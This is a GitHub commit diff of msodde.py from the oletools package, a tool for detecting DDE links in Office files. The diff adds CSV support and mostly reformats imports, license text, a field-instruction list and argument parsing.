Commit 95ca88d297935a2de9175b92152713b64d3f6e6c
Committed by
GitHub
Merge pull request #241 from christian-intra2net/dde-in-csv
Dde in csv
Showing
7 changed files
with
472 additions
and
187 deletions
oletools/msodde.py
| ... | ... | @@ -9,6 +9,7 @@ Supported formats: |
| 9 | 9 | - Word 97-2003 (.doc, .dot), Word 2007+ (.docx, .dotx, .docm, .dotm) |
| 10 | 10 | - Excel 97-2003 (.xls), Excel 2007+ (.xlsx, .xlsm, .xlsb) |
| 11 | 11 | - RTF |
| 12 | +- CSV (exported from / imported into Excel) | |
| 12 | 13 | |
| 13 | 14 | Author: Philippe Lagadec - http://www.decalage.info |
| 14 | 15 | License: BSD, see source code or documentation |
| ... | ... | @@ -17,39 +18,72 @@ msodde is part of the python-oletools package: |
| 17 | 18 | http://www.decalage.info/python/oletools |
| 18 | 19 | """ |
| 19 | 20 | |
| 20 | -# === LICENSE ================================================================== | |
| 21 | +# === LICENSE ================================================================= | |
| 21 | 22 | |
| 22 | 23 | # msodde is copyright (c) 2017 Philippe Lagadec (http://www.decalage.info) |
| 23 | 24 | # All rights reserved. |
| 24 | 25 | # |
| 25 | -# Redistribution and use in source and binary forms, with or without modification, | |
| 26 | -# are permitted provided that the following conditions are met: | |
| 26 | +# Redistribution and use in source and binary forms, with or without | |
| 27 | +# modification, are permitted provided that the following conditions are met: | |
| 27 | 28 | # |
| 28 | -# * Redistributions of source code must retain the above copyright notice, this | |
| 29 | -# list of conditions and the following disclaimer. | |
| 29 | +# * Redistributions of source code must retain the above copyright notice, | |
| 30 | +# this list of conditions and the following disclaimer. | |
| 30 | 31 | # * Redistributions in binary form must reproduce the above copyright notice, |
| 31 | 32 | # this list of conditions and the following disclaimer in the documentation |
| 32 | 33 | # and/or other materials provided with the distribution. |
| 33 | 34 | # |
| 34 | -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND | |
| 35 | -# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED | |
| 36 | -# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
| 37 | -# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
| 38 | -# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
| 39 | -# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
| 40 | -# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
| 41 | -# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
| 42 | -# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
| 43 | -# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
| 35 | +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
| 36 | +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
| 37 | +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE | |
| 38 | +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE | |
| 39 | +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR | |
| 40 | +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF | |
| 41 | +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS | |
| 42 | +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN | |
| 43 | +# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) | |
| 44 | +# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE | |
| 45 | +# POSSIBILITY OF SUCH DAMAGE. | |
| 46 | + | |
| 47 | +# -- IMPORTS ------------------------------------------------------------------ | |
| 44 | 48 | |
| 45 | 49 | from __future__ import print_function |
| 46 | 50 | |
| 47 | -#------------------------------------------------------------------------------ | |
| 51 | +import argparse | |
| 52 | +import zipfile | |
| 53 | +import os | |
| 54 | +from os.path import abspath, dirname | |
| 55 | +import sys | |
| 56 | +import json | |
| 57 | +import logging | |
| 58 | +import re | |
| 59 | +import csv | |
| 60 | + | |
| 61 | +# import lxml or ElementTree for XML parsing: | |
| 62 | +try: | |
| 63 | + # lxml: best performance for XML processing | |
| 64 | + import lxml.etree as ET | |
| 65 | +except ImportError: | |
| 66 | + import xml.etree.cElementTree as ET | |
| 67 | + | |
| 68 | +# little hack to allow absolute imports even if oletools is not installed | |
| 69 | +# Copied from olevba.py | |
| 70 | +PARENT_DIR = dirname(dirname(abspath(__file__))) | |
| 71 | +if PARENT_DIR not in sys.path: | |
| 72 | + sys.path.insert(0, PARENT_DIR) | |
| 73 | +del PARENT_DIR | |
| 74 | + | |
| 75 | +from oletools.thirdparty import olefile | |
| 76 | +from oletools import ooxml | |
| 77 | +from oletools import xls_parser | |
| 78 | +from oletools import rtfobj | |
| 79 | + | |
| 80 | +# ----------------------------------------------------------------------------- | |
| 48 | 81 | # CHANGELOG: |
| 49 | 82 | # 2017-10-18 v0.52 PL: - first version |
| 50 | 83 | # 2017-10-20 PL: - fixed issue #202 (handling empty xml tags) |
| 51 | 84 | # 2017-10-23 ES: - add check for fldSimple codes |
| 52 | -# 2017-10-24 ES: - group tags and track begin/end tags to keep DDE strings together | |
| 85 | +# 2017-10-24 ES: - group tags and track begin/end tags to keep DDE | |
| 86 | +# strings together | |
| 53 | 87 | # 2017-10-25 CH: - add json output |
| 54 | 88 | # 2017-10-25 CH: - parse doc |
| 55 | 89 | # PL: - added logging |
| ... | ... | @@ -59,10 +93,11 @@ from __future__ import print_function |
| 59 | 93 | # 2017-11-29 CH: - added support for xlsb files |
| 60 | 94 | # 2017-11-29 PL: - added support for RTF files (issue #223) |
| 61 | 95 | # 2017-12-07 CH: - ensure rtf file is closed |
| 96 | +# 2018-01-05 CH: - add CSV | |
| 62 | 97 | |
| 63 | -__version__ = '0.52dev9' | |
| 98 | +__version__ = '0.52dev10' | |
| 64 | 99 | |
| 65 | -#------------------------------------------------------------------------------ | |
| 100 | +# ----------------------------------------------------------------------------- | |
| 66 | 101 | # TODO: field codes can be in headers/footers/comments - parse these |
| 67 | 102 | # TODO: generalize behaviour for xlsx: find all external links (maybe rename |
| 68 | 103 | # command line flag for "blacklist" to "find all suspicious" or so) |
| ... | ... | @@ -71,40 +106,10 @@ __version__ = '0.52dev9' |
| 71 | 106 | # DDE-Links |
| 72 | 107 | # TODO: avoid reading complete rtf file data into memory |
| 73 | 108 | |
| 74 | -#------------------------------------------------------------------------------ | |
| 109 | +# ----------------------------------------------------------------------------- | |
| 75 | 110 | # REFERENCES: |
| 76 | 111 | |
| 77 | 112 | |
| 78 | -#--- IMPORTS ------------------------------------------------------------------ | |
| 79 | - | |
| 80 | -import argparse | |
| 81 | -import zipfile | |
| 82 | -import os | |
| 83 | -import sys | |
| 84 | -import json | |
| 85 | -import logging | |
| 86 | -import re | |
| 87 | -from struct import unpack | |
| 88 | - | |
| 89 | -# import lxml or ElementTree for XML parsing: | |
| 90 | -try: | |
| 91 | - # lxml: best performance for XML processing | |
| 92 | - import lxml.etree as ET | |
| 93 | -except ImportError: | |
| 94 | - import xml.etree.cElementTree as ET | |
| 95 | - | |
| 96 | -# little hack to allow absolute imports even if oletools is not installed | |
| 97 | -# Copied from olevba.py | |
| 98 | -_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__))) | |
| 99 | -_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..')) | |
| 100 | -if not _parent_dir in sys.path: | |
| 101 | - sys.path.insert(0, _parent_dir) | |
| 102 | - | |
| 103 | -from oletools.thirdparty import olefile | |
| 104 | -from oletools import ooxml | |
| 105 | -from oletools import xls_parser | |
| 106 | -from oletools import rtfobj | |
| 107 | - | |
| 108 | 113 | # === PYTHON 2+3 SUPPORT ====================================================== |
| 109 | 114 | |
| 110 | 115 | if sys.version_info[0] >= 3: |
| ... | ... | @@ -123,7 +128,9 @@ TAG_W_P = "{%s}p" % NS_WORD |
| 123 | 128 | TAG_W_R = "{%s}r" % NS_WORD |
| 124 | 129 | ATTR_W_INSTR = '{%s}instr' % NS_WORD |
| 125 | 130 | ATTR_W_FLDCHARTYPE = '{%s}fldCharType' % NS_WORD |
| 126 | -LOCATIONS = ['word/document.xml','word/endnotes.xml','word/footnotes.xml','word/header1.xml','word/footer1.xml','word/header2.xml','word/footer2.xml','word/comments.xml'] | |
| 131 | +LOCATIONS = ('word/document.xml', 'word/endnotes.xml', 'word/footnotes.xml', | |
| 132 | + 'word/header1.xml', 'word/footer1.xml', 'word/header2.xml', | |
| 133 | + 'word/footer2.xml', 'word/comments.xml') | |
| 127 | 134 | |
| 128 | 135 | # list of acceptable, harmless field instructions for blacklist field mode |
| 129 | 136 | # c.f. http://officeopenxml.com/WPfieldInstructions.php or the official |
| ... | ... | @@ -133,73 +140,74 @@ LOCATIONS = ['word/document.xml','word/endnotes.xml','word/footnotes.xml','word/ |
| 133 | 140 | # switches_with_args, switches_without_args, format_switches) |
| 134 | 141 | FIELD_BLACKLIST = ( |
| 135 | 142 | # date and time: |
| 136 | - ('CREATEDATE', 0, 0, '', 'hs', 'datetime'), | |
| 137 | - ('DATE', 0, 0, '', 'hls', 'datetime'), | |
| 138 | - ('EDITTIME', 0, 0, '', '', 'numeric'), | |
| 139 | - ('PRINTDATE', 0, 0, '', 'hs', 'datetime'), | |
| 140 | - ('SAVEDATE', 0, 0, '', 'hs', 'datetime'), | |
| 141 | - ('TIME', 0, 0, '', '', 'datetime'), | |
| 143 | + ('CREATEDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace | |
| 144 | + ('DATE', 0, 0, '', 'hls', 'datetime'), # pylint: disable=bad-whitespace | |
| 145 | + ('EDITTIME', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace | |
| 146 | + ('PRINTDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace | |
| 147 | + ('SAVEDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace | |
| 148 | + ('TIME', 0, 0, '', '', 'datetime'), # pylint: disable=bad-whitespace | |
| 142 | 149 | # exclude document automation (we hate the "auto" in "automation") |
| 143 | 150 | # (COMPARE, DOCVARIABLE, GOTOBUTTON, IF, MACROBUTTON, PRINT) |
| 144 | 151 | # document information |
| 145 | - ('AUTHOR', 0, 1, '', '', 'string'), | |
| 146 | - ('COMMENTS', 0, 1, '', '', 'string'), | |
| 147 | - ('DOCPROPERTY', 1, 0, '', '', 'string/numeric/datetime'), | |
| 148 | - ('FILENAME', 0, 0, '', 'p', 'string'), | |
| 149 | - ('FILESIZE', 0, 0, '', 'km', 'numeric'), | |
| 150 | - ('KEYWORDS', 0, 1, '', '', 'string'), | |
| 151 | - ('LASTSAVEDBY', 0, 0, '', '', 'string'), | |
| 152 | - ('NUMCHARS', 0, 0, '', '', 'numeric'), | |
| 153 | - ('NUMPAGES', 0, 0, '', '', 'numeric'), | |
| 154 | - ('NUMWORDS', 0, 0, '', '', 'numeric'), | |
| 155 | - ('SUBJECT', 0, 1, '', '', 'string'), | |
| 156 | - ('TEMPLATE', 0, 0, '', 'p', 'string'), | |
| 157 | - ('TITLE', 0, 1, '', '', 'string'), | |
| 152 | + ('AUTHOR', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | |
| 153 | + ('COMMENTS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | |
| 154 | + ('DOCPROPERTY', 1, 0, '', '', 'string/numeric/datetime'), # pylint: disable=bad-whitespace | |
| 155 | + ('FILENAME', 0, 0, '', 'p', 'string'), # pylint: disable=bad-whitespace | |
| 156 | + ('FILESIZE', 0, 0, '', 'km', 'numeric'), # pylint: disable=bad-whitespace | |
| 157 | + ('KEYWORDS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | |
| 158 | + ('LASTSAVEDBY', 0, 0, '', '', 'string'), # pylint: disable=bad-whitespace | |
| 159 | + ('NUMCHARS', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace | |
| 160 | + ('NUMPAGES', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace | |
| 161 | + ('NUMWORDS', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace | |
| 162 | + ('SUBJECT', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | |
| 163 | + ('TEMPLATE', 0, 0, '', 'p', 'string'), # pylint: disable=bad-whitespace | |
| 164 | + ('TITLE', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | |
| 158 | 165 | # equations and formulas |
| 159 | - # exlude '=' formulae because they have different syntax | |
| 160 | - ('ADVANCE', 0, 0, 'dlruxy', '', ''), | |
| 161 | - ('SYMBOL', 1, 0, 'fs', 'ahju', ''), | |
| 166 | + # exlude '=' formulae because they have different syntax (and can be bad) | |
| 167 | + ('ADVANCE', 0, 0, 'dlruxy', '', ''), # pylint: disable=bad-whitespace | |
| 168 | + ('SYMBOL', 1, 0, 'fs', 'ahju', ''), # pylint: disable=bad-whitespace | |
| 162 | 169 | # form fields |
| 163 | - ('FORMCHECKBOX', 0, 0, '', '', ''), | |
| 164 | - ('FORMDROPDOWN', 0, 0, '', '', ''), | |
| 165 | - ('FORMTEXT', 0, 0, '', '', ''), | |
| 170 | + ('FORMCHECKBOX', 0, 0, '', '', ''), # pylint: disable=bad-whitespace | |
| 171 | + ('FORMDROPDOWN', 0, 0, '', '', ''), # pylint: disable=bad-whitespace | |
| 172 | + ('FORMTEXT', 0, 0, '', '', ''), # pylint: disable=bad-whitespace | |
| 166 | 173 | # index and tables |
| 167 | - ('INDEX', 0, 0, 'bcdefghklpsz', 'ry', ''), | |
| 174 | + ('INDEX', 0, 0, 'bcdefghklpsz', 'ry', ''), # pylint: disable=bad-whitespace | |
| 168 | 175 | # exlude RD since that imports data from other files |
| 169 | - ('TA', 0, 0, 'clrs', 'bi', ''), | |
| 170 | - ('TC', 1, 0, 'fl', 'n', ''), | |
| 171 | - ('TOA', 0, 0, 'bcdegls', 'fhp', ''), | |
| 172 | - ('TOC', 0, 0, 'abcdflnopst', 'huwxz', ''), | |
| 173 | - ('XE', 1, 0, 'frty', 'bi', ''), | |
| 176 | + ('TA', 0, 0, 'clrs', 'bi', ''), # pylint: disable=bad-whitespace | |
| 177 | + ('TC', 1, 0, 'fl', 'n', ''), # pylint: disable=bad-whitespace | |
| 178 | + ('TOA', 0, 0, 'bcdegls', 'fhp', ''), # pylint: disable=bad-whitespace | |
| 179 | + ('TOC', 0, 0, 'abcdflnopst', 'huwxz', ''), # pylint: disable=bad-whitespace | |
| 180 | + ('XE', 1, 0, 'frty', 'bi', ''), # pylint: disable=bad-whitespace | |
| 174 | 181 | # links and references |
| 175 | 182 | # exclude AUTOTEXT and AUTOTEXTLIST since we do not like stuff with 'AUTO' |
| 176 | - ('BIBLIOGRAPHY', 0, 0, 'lfm', '', ''), | |
| 177 | - ('CITATION', 1, 0, 'lfspvm', 'nty', ''), | |
| 183 | + ('BIBLIOGRAPHY', 0, 0, 'lfm', '', ''), # pylint: disable=bad-whitespace | |
| 184 | + ('CITATION', 1, 0, 'lfspvm', 'nty', ''), # pylint: disable=bad-whitespace | |
| 178 | 185 | # exclude HYPERLINK since we are allergic to URLs |
| 179 | 186 | # exclude INCLUDEPICTURE and INCLUDETEXT (other file or maybe even URL?) |
| 180 | 187 | # exclude LINK and REF (could reference other files) |
| 181 | - ('NOTEREF', 1, 0, '', 'fhp', ''), | |
| 182 | - ('PAGEREF', 1, 0, '', 'hp', ''), | |
| 183 | - ('QUOTE', 1, 0, '', '', 'datetime'), | |
| 184 | - ('STYLEREF', 1, 0, '', 'lnprtw', ''), | |
| 188 | + ('NOTEREF', 1, 0, '', 'fhp', ''), # pylint: disable=bad-whitespace | |
| 189 | + ('PAGEREF', 1, 0, '', 'hp', ''), # pylint: disable=bad-whitespace | |
| 190 | + ('QUOTE', 1, 0, '', '', 'datetime'), # pylint: disable=bad-whitespace | |
| 191 | + ('STYLEREF', 1, 0, '', 'lnprtw', ''), # pylint: disable=bad-whitespace | |
| 185 | 192 | # exclude all Mail Merge commands since they import data from other files |
| 186 | 193 | # (ADDRESSBLOCK, ASK, COMPARE, DATABASE, FILLIN, GREETINGLINE, IF, |
| 187 | 194 | # MERGEFIELD, MERGEREC, MERGESEQ, NEXT, NEXTIF, SET, SKIPIF) |
| 188 | 195 | # Numbering |
| 189 | - ('LISTNUM', 0, 1, 'ls', '', ''), | |
| 190 | - ('PAGE', 0, 0, '', '', 'numeric'), | |
| 191 | - ('REVNUM', 0, 0, '', '', ''), | |
| 192 | - ('SECTION', 0, 0, '', '', 'numeric'), | |
| 193 | - ('SECTIONPAGES', 0, 0, '', '', 'numeric'), | |
| 194 | - ('SEQ', 1, 1, 'rs', 'chn', 'numeric'), | |
| 195 | - # user information | |
| 196 | - ('USERADDRESS', 0, 1, '', '', 'string'), | |
| 197 | - ('USERINITIALS', 0, 1, '', '', 'string'), | |
| 198 | - ('USERNAME', 0, 1, '', '', 'string'), | |
| 196 | + ('LISTNUM', 0, 1, 'ls', '', ''), # pylint: disable=bad-whitespace | |
| 197 | + ('PAGE', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace | |
| 198 | + ('REVNUM', 0, 0, '', '', ''), # pylint: disable=bad-whitespace | |
| 199 | + ('SECTION', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace | |
| 200 | + ('SECTIONPAGES', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace | |
| 201 | + ('SEQ', 1, 1, 'rs', 'chn', 'numeric'), # pylint: disable=bad-whitespace | |
| 202 | + # user information # pylint: disable=bad-whitespace | |
| 203 | + ('USERADDRESS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | |
| 204 | + ('USERINITIALS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | |
| 205 | + ('USERNAME', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | |
| 199 | 206 | ) |
| 200 | 207 | |
| 201 | 208 | FIELD_DDE_REGEX = re.compile(r'^\s*dde(auto)?\s+', re.I) |
| 202 | 209 | |
| 210 | +# filter modes | |
| 203 | 211 | FIELD_FILTER_DDE = 'only dde' |
| 204 | 212 | FIELD_FILTER_BLACKLIST = 'exclude blacklisted' |
| 205 | 213 | FIELD_FILTER_ALL = 'keep all' |
| ... | ... | @@ -229,6 +237,7 @@ LOG_LEVELS = { |
| 229 | 237 | 'critical': logging.CRITICAL |
| 230 | 238 | } |
| 231 | 239 | |
| 240 | + | |
| 232 | 241 | class NullHandler(logging.Handler): |
| 233 | 242 | """ |
| 234 | 243 | Log Handler without output, to avoid printing messages if logging is not |
| ... | ... | @@ -239,6 +248,7 @@ class NullHandler(logging.Handler): |
| 239 | 248 | def emit(self, record): |
| 240 | 249 | pass |
| 241 | 250 | |
| 251 | + | |
| 242 | 252 | def get_logger(name, level=logging.CRITICAL+1): |
| 243 | 253 | """ |
| 244 | 254 | Create a suitable logger object for this module. |
| ... | ... | @@ -251,7 +261,7 @@ def get_logger(name, level=logging.CRITICAL+1): |
| 251 | 261 | # First, test if there is already a logger with the same name, else it |
| 252 | 262 | # will generate duplicate messages (due to duplicate handlers): |
| 253 | 263 | if name in logging.Logger.manager.loggerDict: |
| 254 | - #NOTE: another less intrusive but more "hackish" solution would be to | |
| 264 | + # NOTE: another less intrusive but more "hackish" solution would be to | |
| 255 | 265 | # use getLogger then test if its effective level is not default. |
| 256 | 266 | logger = logging.getLogger(name) |
| 257 | 267 | # make sure level is OK: |
| ... | ... | @@ -292,8 +302,8 @@ def ensure_stdout_handles_unicode(): |
| 292 | 302 | # try to find encoding for sys.stdout |
| 293 | 303 | encoding = None |
| 294 | 304 | try: |
| 295 | - encoding = sys.stdout.encoding # variable encoding might not exist | |
| 296 | - except Exception: | |
| 305 | + encoding = sys.stdout.encoding | |
| 306 | + except AttributeError: # variable "encoding" might not exist | |
| 297 | 307 | pass |
| 298 | 308 | |
| 299 | 309 | if encoding not in (None, '', 'ascii'): |
| ... | ... | @@ -316,7 +326,8 @@ def ensure_stdout_handles_unicode(): |
| 316 | 326 | sys.stdout = wrapper(sys.stdout) |
| 317 | 327 | |
| 318 | 328 | |
| 319 | -ensure_stdout_handles_unicode() # e.g. for print(text) in main() | |
| 329 | +if sys.version_info.major < 3: | |
| 330 | + ensure_stdout_handles_unicode() # e.g. for print(text) in main() | |
| 320 | 331 | |
| 321 | 332 | |
| 322 | 333 | # === ARGUMENT PARSING ======================================================= |
| ... | ... | @@ -338,28 +349,34 @@ def existing_file(filename): |
| 338 | 349 | |
| 339 | 350 | def process_args(cmd_line_args=None): |
| 340 | 351 | """ parse command line arguments (given ones or per default sys.argv) """ |
| 341 | - parser = ArgParserWithBanner(description='A python tool to detect and extract DDE links in MS Office files') | |
| 352 | + parser = ArgParserWithBanner(description='A python tool to detect and ' | |
| 353 | + 'extract DDE links in MS Office files') | |
| 342 | 354 | parser.add_argument("filepath", help="path of the file to be analyzed", |
| 343 | 355 | type=existing_file, metavar='FILE') |
| 344 | 356 | parser.add_argument('-j', "--json", action='store_true', |
| 345 | 357 | help="Output in json format. Do not use with -ldebug") |
| 346 | - parser.add_argument("--nounquote", help="don't unquote values",action='store_true') | |
| 347 | - parser.add_argument('-l', '--loglevel', dest="loglevel", action="store", default=DEFAULT_LOG_LEVEL, | |
| 348 | - help="logging level debug/info/warning/error/critical (default=%(default)s)") | |
| 358 | + parser.add_argument("--nounquote", help="don't unquote values", | |
| 359 | + action='store_true') | |
| 360 | + parser.add_argument('-l', '--loglevel', dest="loglevel", action="store", | |
| 361 | + default=DEFAULT_LOG_LEVEL, | |
| 362 | + help="logging level debug/info/warning/error/critical " | |
| 363 | + "(default=%(default)s)") | |
| 349 | 364 | filter_group = parser.add_argument_group( |
| 350 | - title='Filter which OpenXML field commands are returned', | |
| 351 | - description='Only applies to OpenXML (e.g. docx) and rtf, not to OLE ' | |
| 352 | - '(e.g. .doc). These options are mutually exclusive, last ' | |
| 353 | - 'option found on command line overwrites earlier ones.') | |
| 365 | + title='Filter which OpenXML field commands are returned', | |
| 366 | + description='Only applies to OpenXML (e.g. docx) and rtf, not to OLE ' | |
| 367 | + '(e.g. .doc). These options are mutually exclusive, last ' | |
| 368 | + 'option found on command line overwrites earlier ones.') | |
| 354 | 369 | filter_group.add_argument('-d', '--dde-only', action='store_const', |
| 355 | 370 | dest='field_filter_mode', const=FIELD_FILTER_DDE, |
| 356 | 371 | help='Return only DDE and DDEAUTO fields') |
| 357 | 372 | filter_group.add_argument('-f', '--filter', action='store_const', |
| 358 | - dest='field_filter_mode', const=FIELD_FILTER_BLACKLIST, | |
| 359 | - help='Return all fields except harmless ones like PAGE') | |
| 373 | + dest='field_filter_mode', | |
| 374 | + const=FIELD_FILTER_BLACKLIST, | |
| 375 | + help='Return all fields except harmless ones') | |
| 360 | 376 | filter_group.add_argument('-a', '--all-fields', action='store_const', |
| 361 | 377 | dest='field_filter_mode', const=FIELD_FILTER_ALL, |
| 362 | - help='Return all fields, irrespective of their contents') | |
| 378 | + help='Return all fields, irrespective of their ' | |
| 379 | + 'contents') | |
| 363 | 380 | parser.set_defaults(field_filter_mode=FIELD_FILTER_DEFAULT) |
| 364 | 381 | |
| 365 | 382 | return parser.parse_args(cmd_line_args) |
| ... | ... | @@ -368,16 +385,19 @@ def process_args(cmd_line_args=None): |
| 368 | 385 | # === FUNCTIONS ============================================================== |
| 369 | 386 | |
| 370 | 387 | # from [MS-DOC], section 2.8.25 (PlcFld): |
| 371 | -# A field consists of two parts: field instructions and, optionally, a result. All fields MUST begin with | |
| 372 | -# Unicode character 0x0013 with sprmCFSpec applied with a value of 1. This is the field begin | |
| 373 | -# character. All fields MUST end with a Unicode character 0x0015 with sprmCFSpec applied with a value | |
| 374 | -# of 1. This is the field end character. If the field has a result, then there MUST be a Unicode character | |
| 375 | -# 0x0014 with sprmCFSpec applied with a value of 1 somewhere between the field begin character and | |
| 376 | -# the field end character. This is the field separator. The field result is the content between the field | |
| 377 | -# separator and the field end character. The field instructions are the content between the field begin | |
| 378 | -# character and the field separator, if one is present, or between the field begin character and the field | |
| 379 | -# end character if no separator is present. The field begin character, field end character, and field | |
| 380 | -# separator are collectively referred to as field characters. | |
| 388 | +# A field consists of two parts: field instructions and, optionally, a result. | |
| 389 | +# All fields MUST begin with Unicode character 0x0013 with sprmCFSpec applied | |
| 390 | +# with a value of 1. This is the field begin character. All fields MUST end | |
| 391 | +# with a Unicode character 0x0015 with sprmCFSpec applied with a value of 1. | |
| 392 | +# This is the field end character. If the field has a result, then there MUST | |
| 393 | +# be a Unicode character 0x0014 with sprmCFSpec applied with a value of 1 | |
| 394 | +# somewhere between the field begin character and the field end character. This | |
| 395 | +# is the field separator. The field result is the content between the field | |
| 396 | +# separator and the field end character. The field instructions are the content | |
| 397 | +# between the field begin character and the field separator, if one is present, | |
| 398 | +# or between the field begin character and the field end character if no | |
| 399 | +# separator is present. The field begin character, field end character, and | |
| 400 | +# field separator are collectively referred to as field characters. | |
| 381 | 401 | |
| 382 | 402 | |
| 383 | 403 | def process_doc_field(data): |
| ... | ... | @@ -387,7 +407,6 @@ def process_doc_field(data): |
| 387 | 407 | log.debug('processing field \'{0}\''.format(data)) |
| 388 | 408 | |
| 389 | 409 | if data.lstrip().lower().startswith(u'dde'): |
| 390 | - #log.debug('--> is DDE!') | |
| 391 | 410 | return data |
| 392 | 411 | elif data.lstrip().lower().startswith(u'\x00d\x00d\x00e\x00'): |
| 393 | 412 | return data |
| ... | ... | @@ -512,7 +531,6 @@ def process_doc(filepath): |
| 512 | 531 | return u'\n'.join(links) |
| 513 | 532 | |
| 514 | 533 | |
| 515 | - | |
| 516 | 534 | def process_xls(filepath): |
| 517 | 535 | """ find dde links in excel ole file """ |
| 518 | 536 | |
| ... | ... | @@ -531,17 +549,15 @@ def process_xls(filepath): |
| 531 | 549 | |
| 532 | 550 | |
| 533 | 551 | def process_docx(filepath, field_filter_mode=None): |
| 552 | + """ find dde-links (and other fields) in Word 2007+ files """ | |
| 534 | 553 | log.debug('process_docx') |
| 535 | 554 | all_fields = [] |
| 536 | - with zipfile.ZipFile(filepath) as z: | |
| 537 | - for filepath in z.namelist(): | |
| 555 | + with zipfile.ZipFile(filepath) as zipper: | |
| 556 | + for filepath in zipper.namelist(): | |
| 538 | 557 | if filepath in LOCATIONS: |
| 539 | - data = z.read(filepath) | |
| 558 | + data = zipper.read(filepath) | |
| 540 | 559 | fields = process_xml(data) |
| 541 | 560 | if len(fields) > 0: |
| 542 | - #print ('DDE Links in %s:'%filepath) | |
| 543 | - #for f in fields: | |
| 544 | - # print(f) | |
| 545 | 561 | all_fields.extend(fields) |
| 546 | 562 | |
| 547 | 563 | # apply field command filter |
| ... | ... | @@ -560,8 +576,10 @@ def process_docx(filepath, field_filter_mode=None): |
| 560 | 576 | .format(field_filter_mode)) |
| 561 | 577 | |
| 562 | 578 | return u'\n'.join(clean_fields) |
| 563 | - | |
| 579 | + | |
| 580 | + | |
| 564 | 581 | def process_xml(data): |
| 582 | + """ Find dde-links and other fields in office XML data """ | |
| 565 | 583 | # parse the XML data: |
| 566 | 584 | root = ET.fromstring(data) |
| 567 | 585 | fields = [] |
| ... | ... | @@ -569,39 +587,41 @@ def process_xml(data): |
| 569 | 587 | level = 0 |
| 570 | 588 | # find all the tags 'w:p': |
| 571 | 589 | # parse each for begin and end tags, to group DDE strings |
| 572 | - # fldChar can be in either a w:r element, floating alone in the w:p or spread accross w:p tags | |
| 590 | + # fldChar can be in either a w:r element, floating alone in the w:p | |
| 591 | + # or spread accross w:p tags | |
| 573 | 592 | # escape DDE if quoted etc |
| 574 | 593 | # (each is a chunk of a DDE link) |
| 575 | 594 | |
| 576 | 595 | for subs in root.iter(TAG_W_P): |
| 577 | 596 | elem = None |
| 578 | - for e in subs: | |
| 579 | - #check if w:r and if it is parse children elements to pull out the first FLDCHAR or INSTRTEXT | |
| 580 | - if e.tag == TAG_W_R: | |
| 581 | - for child in e: | |
| 582 | - if child.tag == TAG_W_FLDCHAR or child.tag == TAG_W_INSTRTEXT: | |
| 597 | + for curr_elem in subs: | |
| 598 | + # check if w:r; parse children to pull out first FLDCHAR/INSTRTEXT | |
| 599 | + if curr_elem.tag == TAG_W_R: | |
| 600 | + for child in curr_elem: | |
| 601 | + if child.tag == TAG_W_FLDCHAR or \ | |
| 602 | + child.tag == TAG_W_INSTRTEXT: | |
| 583 | 603 | elem = child |
| 584 | 604 | break |
| 585 | 605 | else: |
| 586 | - elem = e | |
| 587 | - #this should be an error condition | |
| 606 | + elem = curr_elem | |
| 607 | + # this should be an error condition | |
| 588 | 608 | if elem is None: |
| 589 | 609 | continue |
| 590 | - | |
| 591 | - #check if FLDCHARTYPE and whether "begin" or "end" tag | |
| 610 | + | |
| 611 | + # check if FLDCHARTYPE and whether "begin" or "end" tag | |
| 592 | 612 | if elem.attrib.get(ATTR_W_FLDCHARTYPE) is not None: |
